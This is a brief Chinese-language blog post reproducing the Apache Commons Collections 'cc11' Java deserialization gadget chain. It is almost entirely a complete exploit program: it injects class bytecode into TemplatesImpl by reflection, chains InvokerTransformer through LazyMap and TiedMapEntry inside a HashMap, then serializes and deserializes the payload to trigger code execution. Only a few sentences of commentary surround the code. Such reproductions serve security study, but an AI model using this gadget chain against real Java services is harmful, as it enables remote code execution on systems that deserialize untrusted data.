java 反序列化 cc11 复现

cc11就是对我们调试过的cc3中出口为LazyMap并且没有绕过InvokerTransformer的版本进行修改,使其不出现非javase中的数组.换句话说就是绕过了ChainedTransformer
直接来看exp

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

import java.io.*;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.ExceptionPredicate;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class Main {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templatesimpl = new TemplatesImpl();

        Class<?> clazz = templatesimpl.getClass();
        Field field = clazz.getDeclaredField("_name");
        field.setAccessible(true);
        field.set(templatesimpl, "test");

        Field field2 = clazz.getDeclaredField("_bytecodes");
        field2.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("F:\\idea_workspace\\cc3\\target\\classes\\org\\example\\test.class"));
        byte[][] codes = {code};
        field2.set(templatesimpl, codes);

        Field field3 = clazz.getDeclaredField("_tfactory");
        field3.setAccessible(true);
        field3.set(templatesimpl, new TransformerFactoryImpl());

        InvokerTransformer it = new InvokerTransformer("newTransformer", null, null);

        Map lazymap = LazyMap.decorate(new HashMap(), it);//此处进行修改
        TiedMapEntry tiedMapEntry = new TiedMapEntry(LazyMap.decorate(new HashMap(), new ConstantTransformer(null)), templatesimpl);//此处进行修改

        HashMap<Object, Object> hashMap = new HashMap<>();
        hashMap.put(tiedMapEntry, null);

        Class clazz1 = TiedMapEntry.class;
        Field field1 = clazz1.getDeclaredField("map");
        field1.setAccessible(true);
        field1.set(tiedMapEntry, lazymap);

        serial(hashMap);
        unserial();
    }

    public static void serial(Object obj) throws Exception {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("./cc1.bin"));
        out.writeObject(obj);
    }

    public static void unserial() throws Exception {
        ObjectInputStream in = new ObjectInputStream(new FileInputStream("./cc1.bin"));
        in.readObject();
    }
}

看了一下,和网上的版本不太一样.利用链和cc3一样,没啥可说的.